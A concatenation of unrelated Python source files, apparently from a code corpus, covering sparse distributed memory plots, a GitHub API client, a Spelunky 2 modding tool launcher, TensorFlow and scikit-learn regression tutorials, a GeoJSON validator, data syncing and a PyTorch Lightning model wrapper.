def plot_line(x, y, label_prefix, label_val, norm=True):
label = label_prefix
if label_val:
label +=str(label_val)
if norm:
y = y/sum(y)
plt.plot(x, y, label=label)
def label_plot(title, norm=True, directory="figures/Jaeckel_Analysis/", save_name=None):
plt.legend()
plt.title(title)
plt.xlabel('Hamming Distance Between Pattern and Query')
if norm:
plt.ylabel('Normalized overlap weights')
else:
plt.ylabel('Expected neurons in intersection')
if save_name:
plt.gcf().savefig(directory+save_name+'.png', dpi=250)
plt.show()
def SDM_Interpretable(params, dvals, thresholds, title=None, label_prefix='ham='):
"""Same as the SDM lune equation in results. Equation was inspired by Jaeckel's SDM Hyperplane but applied to the SDM setting with binary vectors and optimized by working out lower and upper bounds to avoid using a CSP. This equation is much more interpretable than the Lune one used in the SDM Appendix B.
See paper for the constraints and bounds explained."""
perc_addresses_w_neurons = np.log(params.r) - np.log(2.0**params.n)
for thresh in thresholds:
res = []
for dval in dvals:
possible_addresses = 0
#print('range of a vals', np.arange(params.n-thresh-(dval//2),params.n+1-dval))
for a in np.arange(params.n-thresh-(dval//2),params.n+0.1-dval):
# solve just for b then c is determined.
bvals = np.arange(np.maximum(0,params.n-thresh-a), dval-(params.n-thresh-a)+0.1) # +0.1 to ensure that the value here is represented.
#print(a, 'b values', bvals)
if len(bvals)==0:
continue
possible_addresses += comb(params.n-dval,a)*comb(dval,bvals).sum()
expected_intersect = perc_addresses_w_neurons + np.log(possible_addresses)
res.append(np.exp(expexcted_intersect))
res =np.asarray(res)
plot_line(dvals, res, label_prefix, thresh, params.norm)
if params.fit_beta_and_plot_attention:
fit_beta_res, beta = fit_beta_regression(params.n, dvals, res)
plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, thresh, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def SDM_lune(params, dvals, title=None, label_prefix='ham='):
"""Exact calculation for SDM circle intersection. For some reason mine is a slight upper bound on the results found in the book. Uses a proof from Appendix B of the SDM book (Kanerva, 1988). Difference is neglible when norm=True."""
res = expected_intersection_lune(params.n, dvals, params.hamm_radius, params.r )
if params.plot_lines:
plot_line(dvals, res, label_prefix, params.hamm_radius, params.norm)
if params.fit_beta_and_plot_attention:
fit_beta_res, beta = fit_beta_regression(params.n, dvals, res)
plot_line(dvals, fit_beta_res, 'fit_beta | '+label_prefix, params.hamm_radius, params.norm)
if title: # else can call "label plot separately"
label_plot(title, params.norm)
return res
def f(x, c_p):
"""This is used in the continuous approximation to the circle intersection derived in Appendix B of the SDM book that needs to be numerically integrated. It is less accurate than the exact equation we outline in the paper and use for our circle intersection computations in all figures and analyses unless otherwise noted."""
return 1/(2*np.pi*np.sqrt(x*(1-x)))*np.exp(-0.5*(c_p**2/(1-x)))
def expected_intersection_continuous(n, dvals, hamm_radius, r, hard_mem_places):
"""
Uses binary vector space with a continuous approximation from the SDM book that is inaccurate!
Computes the fraction of the space that exists in the circle intersection using the continuous approximation to the Lune equation.
args::
n = space dimension
dvals = Hamm dist between circle centers
hamm_radius = hamming distance radius each circle uses
r = number of neurons
hard_mem_places = turns the fraction of the space in the
expected number of neurons
that exist in this fraction.
------------
returns::
res = list of floats for fractions of the space or number of neurons present in this fraction depending if hard_mem_places is on.
"""
res = []
for dv in dvals:
c_p = (hamm_radius-(n/2))/np.sqrt(n/4)
intersect = quad(f, dv/n,1, args=(c_p))
num = intersect[0]
if hard_mem_places:
num*=r
res.append(num)
return res | nilq/baby-python | python |
import json
import sys
from concurrent.futures import ThreadPoolExecutor, Future
from urllib3.connectionpool import HTTPSConnectionPool, HTTPResponse
from urllib3.exceptions import NewConnectionError, MaxRetryError, HTTPError
from typing import Dict, List, Any
from string import Template
class NetMod:
_instance = None
__pool: HTTPSConnectionPool
__pool_size: int = 5
__api_base: str = 'api.github.com'
__port: int = 443
__timeout: float = 5.0
__repo_route: Template = Template('/repos/$repo')
__user_route: Template = Template('/users/$user')
__org_route: Template = Template('/users/$user/orgs')
"""
explicitly request v3 of the API
https://docs.github.com/en/rest/overview/resources-in-the-rest-api#current-version
"""
__headers: Dict[str, str] = {
'Accept': 'application/vnd.github.v3+json',
'User-Agent': 'Python-urllib/3',
'Authorization': ''
}
"""
referenced from
https://python-patterns.guide/gang-of-four/singleton/
"""
def __new__(cls, *args, **kwargs):
if cls._instance is None:
cls._instance = super(NetMod, cls).__new__(cls)
return cls._instance
def __init__(self):
self.__pool = HTTPSConnectionPool(host=NetMod.__api_base, maxsize=NetMod.__pool_size, headers=NetMod.__headers,
timeout=NetMod.__timeout, port=NetMod.__port, block=True)
def __make_request(self, api_route: str, method: str = 'get') -> Dict[str, Any]:
try:
response: HTTPResponse = self.__pool.request(method, api_route, release_conn=True, redirect=True)
res_data = json.loads(response.data)
if response.status != 200:
raise HTTPError(response.status, res_data['message'])
return res_data
except (NewConnectionError, MaxRetryError):
sys.exit("""Failed to connect. Exiting...""")
except HTTPError as err:
sys.exit(err)
def fetch_repos_data(self, repos: List[str]) -> Dict[str, Any]:
api_routes = [self.__repo_route.substitute(repo=repo) for repo in repos]
return self.__fetch_all__concurrent(repos, api_routes)
def fetch_users_data(self, users: List[str]) -> Dict[str, Any]:
api_routes = [self.__user_route.substitute(user=user) for user in users]
return self.__fetch_all__concurrent(users, api_routes)
def fetch_org_data(self, user: str) -> Dict[str, Any]:
api_route = self.__org_route.substitute(user=user)
return self.__make_request(api_route)
def __fetch_all__concurrent(self, entries: List[str], api_routes: List[str]) -> Dict[str, Any]:
max_workers = max(len(entries), self.__pool_size)
with ThreadPoolExecutor(max_workers=max_workers) as executor:
res: Dict[str, Future[Dict[str, Any]]] = {entry: executor.submit(self.__make_request, route) for
entry, route in
zip(entries, api_routes)}
return {user: data.result() for user, data in res.items()}
| nilq/baby-python | python |
import argparse
import logging
import sys
from pathlib import Path
import requests
from flask import Flask
from packaging import version
from .views.assets import blueprint as assets_blueprint
from .views.index import blueprint as index_blueprint
PROCESS_NAME = "Spel2.exe"
# Setup static files to work with onefile exe
BASE_DIR = Path(__file__).resolve().parent
APP_DIR = BASE_DIR
ROOT_DIR = BASE_DIR.parent.parent
if hasattr(sys, "_MEIPASS"):
BASE_DIR = BASE_DIR / getattr(sys, "_MEIPASS")
APP_DIR = Path(sys.executable).resolve().parent
ROOT_DIR = BASE_DIR
app = Flask(
__name__,
static_folder=f"{BASE_DIR / 'static'}",
template_folder=f"{BASE_DIR / 'templates'}",
)
app.register_blueprint(index_blueprint)
app.register_blueprint(assets_blueprint, url_prefix="/assets")
def get_latest_version():
try:
return version.parse(
requests.get(
"https://api.github.com/repos/spelunky-fyi/modlunky2/releases/latest"
).json()["tag_name"]
)
except Exception: # pylint: disable=broad-except
return None
def get_current_version():
with (ROOT_DIR / "VERSION").open() as version_file:
return version.parse(version_file.read().strip())
def main():
parser = argparse.ArgumentParser(description="Tool for modding Spelunky 2.")
parser.add_argument(
"--host", type=str, default="127.0.0.1", help="The host to listen on."
)
parser.add_argument("--port", type=int, default=8040, help="Port to listen on.")
parser.add_argument("--debug", default=False, action="store_true")
parser.add_argument(
"--process-name",
default=PROCESS_NAME,
help="Name of Spelunky Process. (Default: %(default)s",
)
parser.add_argument(
"--install-dir",
default=APP_DIR,
help="Path to Spelunky 2 installation. (Default: %(default)s",
)
args = parser.parse_args()
log_format = "%(asctime)s: %(message)s"
logging.basicConfig(format=log_format, level=logging.INFO, datefmt="%H:%M:%S")
try:
app.config.SPELUNKY_INSTALL_DIR = Path(args.install_dir)
app.config.MODLUNKY_CURRENT_VERSION = get_current_version()
app.config.MODLUNKY_LATEST_VERSION = get_latest_version()
app.config.MODLUNKY_NEEDS_UPDATE = (
app.config.MODLUNKY_CURRENT_VERSION < app.config.MODLUNKY_LATEST_VERSION
)
app.run(host=args.host, port=args.port, debug=args.debug)
except Exception as err: # pylint: disable=broad-except
input(f"Failed to start ({err}). Press enter to exit... :(")
| nilq/baby-python | python |
import pandas as pd
import matplotlib.pyplot as plt
import tensorflow as tf
from tensorflow.keras import Model
from tensorflow.keras.layers import Dense
import numpy as np
import os
# We set seeds for reproduciability
tf.random.set_seed(1)
np.random.seed(1)
url = 'https://archive.ics.uci.edu/ml/machine-learning-databases/autos/imports-85.data'
# download the data from given URL and with given columns
columns = ['symbolying','normalized-losses', 'make', 'fuel-type', 'aspiration', 'num-of-doors', 'body-style', 'drive-wheels', 'engine-location'
,'wheel-base', 'length', 'width', 'height', 'curb-weight', 'engine-type', 'num-of-cylinders', 'engine-size', 'fuel-system'
,'bore', 'stroke', 'compression-ratio', 'horsepower', 'peak-rpm', 'city-mpg', 'highway-mpg', 'price']
#loading the dataset using pandas and replacing "?" with NA values
raw_data = pd.read_csv(url,names=columns,na_values="?")
#We ignore 'symboling' column
raw_data.pop('symbolying')
#drop all rows with missing values
dataset = raw_data.dropna().copy()
# we perform min-max normalization as the following
norm_data = dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]].copy()
norm_data_mins = norm_data.min()
norm_data_maxs = norm_data.max()
normalized_features =(norm_data-norm_data_mins)/(norm_data_maxs - norm_data_mins)
dataset.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]] = normalized_features.loc[:,["wheel-base","length","width","height","curb-weight","engine-size","bore","stroke","compression-ratio","horsepower","peak-rpm","city-mpg","highway-mpg","price"]]
dataset = pd.get_dummies(dataset,columns=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],
prefix=["num-of-cylinders","num-of-doors","make","fuel-type","aspiration","body-style","drive-wheels"
,"engine-location","engine-type","fuel-system"],prefix_sep='_')
# We set 80% of the available data for training and the rest for testing
train_dataset = dataset.sample(frac = 0.8, random_state=1)
test_dataset = dataset.drop(train_dataset.index)
train_features = train_dataset.copy()
test_features = test_dataset.copy()
train_labels = train_features.pop('normalized-losses')
test_labels = test_features.pop('normalized-losses')
# Working with such small dataset, it is better to train the model sample by sample for it to converge quickly
batch_size = 1
train_ds = tf.data.Dataset.from_tensor_slices((np.array(train_features),np.log(np.array(train_labels)))).batch(batch_size)
test_ds = tf.data.Dataset.from_tensor_slices((np.array(test_features),np.log(np.array(test_labels)))).batch(batch_size)
class Regression_Model(Model):
def __init__(self):
super(Regression_Model,self).__init__()
self.dense1 = Dense(64, activation='relu' )
self.dense2 = Dense(32, activation='relu' )
self.dense3 = Dense(16, activation='relu' )
self.final = Dense(1)
def call(self,x):
x = self.dense1(x)
x = self.dense2(x)
x = self.dense3(x)
return self.final(x)
class Trainer:
def __init__(self):
self.model:Regression_Model = Regression_Model()
self.loss = self.get_loss()
self.optimizer = self.get_optimizer("SGD")
self.train_loss = tf.keras.metrics.Mean(name='train_loss')
self.test_loss = tf.keras.metrics.Mean(name='test_loss')
def get_optimizer(self,opt="adam"):
lr_schedule = tf.keras.optimizers.schedules.InverseTimeDecay(0.1,decay_steps=10000,decay_rate=1,staircase=False)
if opt == 'adam':
return tf.keras.optimizers.Adam(0.001)
elif opt == 'SGD':
return tf.keras.optimizers.SGD(lr_schedule)
else:
raise "This optimizer does not exist"
def get_loss(self,loss='MSE'):
if loss == 'MSE':
return tf.keras.losses.MSE
if loss == 'MAE':
return tf.keras.losses.MAE
else:
raise "error"
def predict(self,features):
return self.model.predict(features)
@tf.function
def train_step(self,features,values):
with tf.GradientTape() as tape:
predictions = self.model(features,training = True)
loss = self.loss(values,predictions)
gradients = tape.gradient(loss,self.model.trainable_variables)
self.optimizer.apply_gradients(zip(gradients,self.model.trainable_variables))
self.train_loss(loss)
@tf.function
def test_step(self,features,values):
predictions = self.model(features,training=False)
loss = self.loss(values,predictions)
self.test_loss(loss)
def train(self):
for epoch in range(100):
self.train_loss.reset_states()
self.test_loss.reset_states()
for features,values in train_ds:
self.train_step(features,values)
for features,values in test_ds:
self.test_step(features,values)
print(
f'Epoch {epoch + 1}, '
f'Loss: {self.train_loss.result()}, '
f'Test Loss: {self.test_loss.result()}, '
)
# Now we reset the random seeds for reproduciability and start the training!
os.environ['PYTHONHASHSEED']=str(1)
tf.random.set_seed(1)
np.random.seed(1)
trainer = Trainer()
trainer.train()
# lets see th esummary of the trained model
trainer.model.summary()
# Now we test the model on the test set
predictions = np.exp(np.reshape(trainer.model.predict(np.array(test_features)),(np.shape(test_features)[0],)))
mse = (np.square(predictions - test_labels)).mean()
percentage = np.mean(np.abs(predictions - test_labels)/(test_labels))
print("mean squared error is {} and the percentage is {}".format(mse,percentage))
#Our deep neural ntwork model achieved a mean squared error of 226.68 (15.05 RMSE) and a percentage Error of 9.35%.
plt.plot(predictions)
plt.plot(np.array(test_labels))
plt.legend(labels = ["predictions","labels"])
plt.show() | nilq/baby-python | python |
# Aula 20 - 05-12-2019
# Analise de dados superficial
# Dica: Para este formulário será necessário usar um metodo para string novo.
# Vocês já conhecem o .strip() que remove os caracteres especiais \n do final
# da string. o .splint('') que quebra a string em uma lista conforme o caracteres
# que tem dentro das aspas.
# O metodo novo para este exercico é o .replace('{velho}','{novo}') - O velho
# é um caracter que queira substituir e o novo é o caracter que deseja incluir.
# Exemplo pelo shell do pyton:
# >>> 'agua verde mar'.replace('a','A')
# 'AguA verde mAr'
# >>> 'agua verde mar'.replace('a','')
# 'gu verde mr'
# Como vemos, no primeiro exemplo o caracter "a" foi substituido pelo "A"
# e no segundo exemplo o "a" foi removido da string.
# Exercicio!
# Fazer usando funções
# O setor de Marketing da AMBEV criou uma pesquisa de mercado sobre gostos.
# https://forms.gle/PLuAZXpmpBvE1vkX7
# Para analisar os dados desta pesquisa, foi solicita para a HBSIS realizar
# a analise deste dados!
# O nome do arquivo é Formulário.csv
# Deste arquivo deverá sair os seguintes dados:
# Quantas pessoas gostam de cerveja?
# R:
# Quantas pessoas gostam de refrigerante?
# R:
# Quantas pessoas gostam de cerveja e refigerante?
# R:
# Quantas pessoas participaram desta pesquisa?
# R:
# Qual a marca de cerveja que os participantes preferem?
# R:
# Quantos do sexo feminino gostam de bolacha?
# R:
# Quantas mulheres gostam de cerveja?
# R:
# Quantos menores de idade gostam de cerveja?
# R:
# Quantas mulheres gostam de beber cerveja e refrigerante?
# R:
| nilq/baby-python | python |
# pylint: disable=invalid-name
"""Utility function to get information from graph."""
from __future__ import absolute_import as _abs
import tvm
from . import graph_attr
def infer_shape(graph, **shape):
"""Infer the shape given the shape of inputs.
Parameters
----------
graph : Graph
The graph to perform shape inference from
shape : dict of str to tuple
The specific input shape.
Returns
-------
in_shape : list of tuple
Shape of inputs
out_shape: list of tuple
Shape of outputs
"""
graph = graph_attr.set_shape_inputs(graph, shape)
graph = graph.apply("InferShape")
shape = graph.json_attr("shape")
index = graph.index
input_shape = [shape[index.entry_id(x)] for x in index.input_names]
output_shape = [shape[index.entry_id(x)] for x in index.output_entries]
return input_shape, output_shape
def infer_dtype(graph, **dtype):
"""Infer the type given the typeS of inputs.
Parameters
----------
graph : Graph
The graph to perform type inference from
dtype : dict of str to dtype
The specific input data type.
Returns
-------
in_dtype : list of tuple
Dtype of inputs
out_dtype: list of tuple
Dtype of outputs
"""
graph = graph_attr.set_dtype_inputs(graph, dtype)
graph = graph.apply("InferType")
dtype = graph.json_attr("dtype")
index = graph.index
input_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.input_names]
output_dtype = [graph_attr.TCODE_TO_DTYPE[dtype[index.entry_id(x)]]
for x in index.output_entries]
return input_dtype, output_dtype
_deep_compare = tvm.get_global_func("nnvm.graph.DeepCompare")
def check_graph_equal(grapha, graphb, compare_variable_attrs=False):
"""Check if two graphs have equal structure.
Parameters
----------
grapha : Graph
The first graph
graphb : Graph
The second graph
compare_variable_attrs : bool, optional
Whether we want to compare attributes(names) on variables.
Usually it is safe to skip it unless we want input name
to exactly match
Raises
------
ValueError
ValueError is raised with error message when graph not equal
"""
err = _deep_compare(grapha, graphb, compare_variable_attrs)
if err:
raise ValueError("Graph compare error: " + err)
| nilq/baby-python | python |
BLACK = '\033[30m'
RED = '\033[31m'
GREEN = '\033[32m'
YELLOW = '\033[33m'
BLUE = '\033[34m'
MAGENTA = '\033[35m'
CYAN = '\033[36m'
GRAY = '\033[90m'
WHITE = '\033[37m'
UNDERLINE = '\033[4m'
END = '\033[0m' | nilq/baby-python | python |
# -*- coding: utf-8 -*-
"""
.. module:: Backend.utils
:platform: Unix, Windows
.. moduleauthor:: Aki Mäkinen <aki.makinen@outlook.com>
"""
__author__ = 'Aki Mäkinen'
s_codes = {
"OK": 200,
"BAD": 400,
"UNAUTH": 401,
"FORBIDDEN": 403,
"NOTFOUND": 404,
"METHODNOTALLOWED": 405,
"TEAPOT": 418,
"INTERNALERROR": 500
}
_geojson_feature_fields = {
"type": {
"_self_": (unicode(), True),
"_values_": ["Feature"]
},
"geometry": {
"_self_": (dict(), True),
"type": {
"_self_": (unicode(), True),
"_values_": ["Point"]
},
"coordinates": {
"_self_": (list(), True),
"_elements_": float(),
"_elementcount_": 2
}
},
"properties": {
"_self_": (dict(), True),
"metadata": {
"_self_": (dict(), False),
"status": (unicode(), True),
"info": (unicode(), True)
}
},
"id": (unicode(), True)
}
_geojson_featurecollection_fields = {
"type": (unicode(), True), # Field key hard coded in validation
"totalFeatures": (int(), False),
"features": {
"_self_": (list(), True),
"_elements_": _geojson_feature_fields
} # Field key hard coded in validation
}
def geo_json_scheme_validation(jsondict):
"""
A simple GeoJSON validator.
Uses the GeoJSON definitions described in LBD JSON Formats document.
JSON format is described as python dictionary, where the key specifies the name of a JSON field and
value describes if the field/value is required and what is the type of the value. There are some special
key values: _self_ (if the value is list or embedded document), _elements_ (if the value is a list, this describes
the element type) and _elementcount_ (restricts how many elements list can have).
.. note::
This function is a if-else hell... and the JSON format document is outdated.
:param jsondict: GeoJSON formatted Python dictionary containing either GeoJSON Feature or FeatureCollection.
:return Boolean: True or False depending on the result of the validation
"""
if not isinstance(jsondict, dict):
return False
if "type" in jsondict:
# Check that the given itemdict follows the given format.
# Stops at the first error returning False
def check_items(itemdict, itemformat):
for key, value in itemformat.iteritems():
if isinstance(value, tuple):
if value[1] == True and key not in itemdict:
return False
elif key in itemdict:
if not isinstance(itemdict[key], type(value[0])):
return False
elif key.lower() in [k.lower() for k in itemdict]:
return False
else:
pass
elif isinstance(value, dict):
if value["_self_"][1] == True and key not in itemdict:
return False
elif key in itemdict:
if isinstance(value["_self_"][0], list):
if "_elementcount_" in value:
if not len(itemdict[key]) == value["_elementcount_"]:
return False
if isinstance(value["_elements_"], dict):
itemlist = itemdict[key]
newitemformat = dict(value["_elements_"])
for item in itemlist:
result = check_items(item, newitemformat)
if not result:
return False
else:
for listitem in itemdict[key]:
if not isinstance(listitem, type(value["_elements_"])):
return False
elif isinstance(value["_self_"][0], dict):
newitemdict = itemdict[key]
newitemformat = dict(value)
del newitemformat["_self_"]
result = check_items(newitemdict, newitemformat)
if not result:
return False
else:
if isinstance(itemdict[key], type(value["_self_"][0])):
if "_values_" in value:
try:
if itemdict[key].lower() not in [v.lower() for v in value["_values_"]]:
return False
except AttributeError:
if itemdict[key] not in value["_values_"]:
return False
else:
return False
elif key in [k.lower() for k in itemdict]:
return False
else:
pass
else:
return False
return True
if jsondict["type"].lower() == "featurecollection":
result = check_items(jsondict, _geojson_featurecollection_fields)
elif jsondict["type"].lower() == "feature":
result = check_items(jsondict, _geojson_feature_fields)
else:
return False
else:
result = False
return result
def flattener(dicti, parent):
"""
Dictionary flattener
Flattens a dictionary and... Ok I don't remember what this is for.
Creates once iterable list.
:param dicti: Dictionary to be flattened
:param parent: Parent element of the dictionary
"""
for k, v in dicti.iteritems():
if isinstance(v, dict):
if parent is None:
father = k
else:
father = parent + "." + k
for item in flattener(v, father):
yield item
else:
if parent is not None:
yield parent + "." + k
else:
yield k | nilq/baby-python | python |
import logging
from common.DataSyncer import DataSyncer
from common.logger import initialize_logger
from models.User import User
logger = logging.getLogger(__name__)
initialize_logger(logger)
class UserPartialSyncer:
"""
Sync only latest users info from API to db
"""
def __init__(self):
self.dataSyncer = DataSyncer('https://api.bgm.tv/user/', User, 435000, 9)
def calculate_incremental_scraping_range(self):
# get current user with maximum id in database
current_max_id_user = self.dataSyncer.databaseExecutor.session \
.query(User) \
.order_by(User.id.desc()) \
.first()
current_user_max_id = current_max_id_user.id \
if current_max_id_user is not None else 0
return max(1, current_user_max_id), self.dataSyncer.requestHandler.max_id
def run(self):
max_db_id, max_api_id = self.calculate_incremental_scraping_range()
if max_db_id < max_api_id:
logger.info(
'Current max user id:%s in database is smaller than max id:%s in API, starting syncing data from'
' %s to %s', max_db_id, max_api_id, max_db_id, max_api_id)
self.dataSyncer.start_scraper(max_db_id, max_api_id + 1)
else:
logger.info(
'Nothing to sync as there\'s no new user. Current max id in API :%s, max id in database: :%s',
max_api_id, max_db_id)
if __name__ == "__main__":
userPartialSyncer = UserPartialSyncer()
userPartialSyncer.run()
| nilq/baby-python | python |
import sys
import ui
if __name__ == "__main__":
app = ui.QtWidgets.QApplication(sys.argv)
MainWindow = ui.QtWidgets.QMainWindow()
ui = ui.Ui_MainWindow()
ui.setupUi(MainWindow)
MainWindow.show()
sys.exit(app.exec_()) | nilq/baby-python | python |
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
dataset = pd.read_csv("student_scores.csv")
# verisetinin boyutları
dataShape = dataset.shape
print(dataShape)
print(dataset.head(7)) # datasetin başını gösterir. default değer 5'tir.
print(dataset.tail(7)) # datasetin sonunu gösterir. default değer 5'tir.
# Veriseti hakkında ön bilgi için describe() kullanılabilir.
print(dataset.describe())
print(dataset.columns) # verisetindeki kolonların isimlerini verir.
X = dataset.iloc[:, :-1].values #Hours değerleri
y = dataset.iloc[:, 1].values #Scores değerleri
print(X)
print(y)
# Verisetini eğitim ve test olarak parçalar
# test_size=0.2 => verisetinin %80'i eğitim %20'si test için ayrılmasını sağlar
# random_state => fonksiyon her çalışmasında veriyi farklı bir sırayla çekmesinin önüne geçer
# Böylece eğitim her zaman aynı sırayla yapılmış olur.
from sklearn.model_selection import train_test_split
Xtrain, Xtest, ytrain, ytest = train_test_split(X, y, test_size=0.2, random_state=0)
# Regresyon modelinin eklenmesi
from sklearn.linear_model import LinearRegression
reg = LinearRegression() # regresyon nesnesi tanımalama
reg.fit(Xtrain,ytrain) # hazırlanan veriler modele verilir ve eğitime başlanır.
print(reg.intercept_) # Çıkan sonucun yaklaşık 2.01816004143 değerde olması gerekiyor.
# x değişkenini bir birim artmasıyla y'de olan değişiklik
print(reg.coef_) # bu örnek için öğrenci bir saat fazla çalışarak çıkan sonuç kadar yüksek skor elde edebilir.
### Tahmin Yapma
yPred = reg.predict(Xtest) ## Xtest değerlerine göre yapılan tahminler
print(yPred)
# yapılan tahminlerin gerçek verilerle kıyaslanabilmesi için dataframe haline getirilir.
df = pd.DataFrame({"Gerçek Değer": ytest, "Tahmin Edilen değer": yPred})
print(df)
## Performans Değerlendirmesi
from sklearn import metrics
# Mean Absolute Error (MAE) (Ortalama Mutlak Hata) metriğine göre puanı
# Mutlak hata, tahmin edilen değerler ile gerçek değerler arasındaki farktır.
# gerçek değer ile tahmin arasındaki farkın mutlak değeridir.
maeScore = metrics.mean_absolute_error(ytest, yPred)
print("Ortalama Mutlak Hata = " + str(maeScore))
# Mean Squared Error (MSE) (Ortalama Kare Hatası) metriğine göre sonucu
# MSE her değer için gerçek değer ile tahmin arasındaki farkın kareleri toplamının
# aritmetik ortalamasıdır.
mseScore = metrics.mean_squared_error(ytest, yPred)
print("Ortalama Kare Hatası = " + str(mseScore))
# Root Mean Squared Error (RMSE) metriğine göre sonucu
rmseScore = np.sqrt(metrics.mean_squared_error(ytest, yPred))
print("RMSE = "+ str(rmseScore))
# Veri görselleştirme
dataset.plot(x="Hours", y="Scores", style="go")
random_x = [1.1, 5.01, 9.2]
plt.plot(random_x,
reg.intercept_ + reg.coef_ * random_x,
color='red',
label='regresyon grafiği')
plt.title("Saatlere Göre Yüzdelik Skorlar")
plt.xlabel("Çalışma Saatleri")
plt.ylabel("Yüzdelik Skorlar")
plt.savefig("Grafik.jpg")
plt.show()
## Veri seti dışındaki veriler ile yapılan tahminler
testVeri = np.array([0.5, 1.0, 4.2, 6.7, 10.0]).reshape(-1,1)
pred = reg.predict(testVeri)
for i in range(len(testVeri)):
print(str(testVeri[i]) + "=>" + str(pred[i]) ) | nilq/baby-python | python |
import os, sys
variables_size = 3
dataset_name = "Epilepsy"
class_dictionary = {}
class_count = 1
dirname = os.path.abspath(os.path.dirname(sys.argv[0]))
train_test_str = ["_TRAIN","_TEST"]
for i in range(0,2):
arff_data_flag = 0
series_count = 1
file_location = dirname + "/" + dataset_name + train_test_str[i] + ".arff"
with open(file_location) as fin:
newfile_name = dataset_name + train_test_str[i] + "_FORMATED"
with open(newfile_name, "w") as newfile:
for line in fin:
if arff_data_flag == 0:
if line == "@data\n": #check for start of dataset values
arff_data_flag = 1
continue
line = line.split(",")
attribute_iterator = 0
class_value = None
ts_helper = []
for j in range(0,variables_size):
ts_helper.append([])
for j in range(0,len(line)):
if "\\n" in line[j]:
splitted_lines = line[j].split("\\n")
ts_helper[attribute_iterator].append(float(splitted_lines[0]))
attribute_iterator = attribute_iterator + 1
ts_helper[attribute_iterator].append(float(splitted_lines[1]))
elif j == (len(line)-1):
if line[j] in class_dictionary:
class_value = class_dictionary[line[j]]
else:
class_dictionary[line[j]] = class_count
class_value = class_count
class_count = class_count + 1
elif "'" in line[j]:
formated_value = line[j].replace("'","")
ts_helper[attribute_iterator].append(float(formated_value))
elif '"' in line[j]:
formated_value = line[j].replace('"',"")
ts_helper[attribute_iterator].append(float(formated_value))
else:
ts_helper[attribute_iterator].append(float(line[j]))
for j in range(0,len(ts_helper[0])):
line_to_write = ""
line_to_write += str(series_count) + " " + str(j+1) + " " + str(class_value)
for u in range(0,variables_size):
line_to_write += " " + str(ts_helper[u][j])
line_to_write += "\n"
newfile.write(line_to_write)
series_count = series_count + 1
| nilq/baby-python | python |
from .AlgerianMobilePhoneNumber import AlgerianMobilePhoneNumber | nilq/baby-python | python |
from automl_infrastructure.experiment.observations import SimpleObservation
import numpy as np
class Std(SimpleObservation):
"""
Implementation of standard deviation scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.std(values)
class Avg(SimpleObservation):
"""
Implementation of mean scores aggregation.
"""
def __init__(self, metric):
super().__init__(metric)
def agg_func(self, values):
return np.mean(values)
| nilq/baby-python | python |
import torch
import torchvision.transforms as T
from pytorch_grad_cam import GradCAMPlusPlus
from pytorch_lightning import LightningModule
from pawpularity.augmentations import mixup
from . import efficientnet, levit_transformer, swin_transformers, vision_transformers, learnable_resizer
class Model(LightningModule):
supported_models = {
'EfficientNetV2Large': efficientnet.__dict__['EfficientNetV2Large'],
'EfficientNetV2Medium': efficientnet.__dict__['EfficientNetV2Medium'],
'EfficientNetV2Small': efficientnet.__dict__['EfficientNetV2Small'],
'EfficientNetB0': efficientnet.__dict__['EfficientNetB0'],
'EfficientNetB1': efficientnet.__dict__['EfficientNetB1'],
'EfficientNetB2': efficientnet.__dict__['EfficientNetB2'],
'EfficientNetB3': efficientnet.__dict__['EfficientNetB3'],
'EfficientNetB4': efficientnet.__dict__['EfficientNetB4'],
'EfficientNetB5': efficientnet.__dict__['EfficientNetB5'],
'Levit': levit_transformer.__dict__['Levit'],
'SwinLarge': swin_transformers.__dict__['SwinLarge'],
'SwinLargev2': swin_transformers.__dict__['SwinLargev2'],
'SwinSmall': swin_transformers.__dict__['SwinSmall'],
'SwinTiny': swin_transformers.__dict__['SwinTiny'],
'ViTTiny': vision_transformers.__dict__['ViTTiny'],
'ViTTinyv2': vision_transformers.__dict__['ViTTinyv2'],
'ViTSmall': vision_transformers.__dict__['ViTSmall'],
'ViTSmallv2': vision_transformers.__dict__['ViTSmallv2'],
'ViTLarge': vision_transformers.__dict__['ViTLarge'],
'ViTLargev2': vision_transformers.__dict__['ViTLargev2'],
'ViTHybridTiny': vision_transformers.__dict__['ViTHybridTiny'],
'ViTHybridTinyv2': vision_transformers.__dict__['ViTHybridTinyv2'],
'ViTHybridSmall': vision_transformers.__dict__['ViTHybridSmall'],
'ViTHybridSmallv2': vision_transformers.__dict__['ViTHybridSmallv2'],
'ViTHybridLarge': vision_transformers.__dict__['ViTHybridLarge'],
'ViTHybridLargev2': vision_transformers.__dict__['ViTHybridLargev2'],
}
supported_loss = {
'BCEWithLogitsLoss': torch.nn.BCEWithLogitsLoss
}
supported_optimizers = {
'Adam': torch.optim.Adam,
'AdamW': torch.optim.AdamW
}
supported_schedulers = {
'CosineAnnealingWarmRestarts': torch.optim.lr_scheduler.CosineAnnealingWarmRestarts
}
def __init__(self,
cfg):
super().__init__()
self.cfg = cfg
self._build_model()
self._build_criterion()
self.save_hyperparameters(self.cfg.asdict)
def _build_model(self):
if self.cfg.model_name not in self.supported_models:
raise ValueError(
f"{self.cfg.model_name} not supported, check your configuration")
self.model = self.supported_models[self.cfg.model_name](self.cfg)
def _build_criterion(self):
if self.cfg.loss not in self.supported_loss:
raise ValueError(
f"{self.cfg.loss} not supported, check your configuration")
self.criterion = self.supported_loss[self.cfg.loss]()
def _build_optimizer(self):
if self.cfg.optimizer['name'] not in self.supported_optimizers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
self.optimizer = self.supported_optimizers[self.cfg.optimizer['name']](
self.parameters(), **self.cfg.optimizer['params'])
def _build_scheduler(self):
if self.cfg.scheduler['name'] not in self.supported_schedulers:
raise ValueError(
f"{self.cfg.optimizer} not supported, check your configuration")
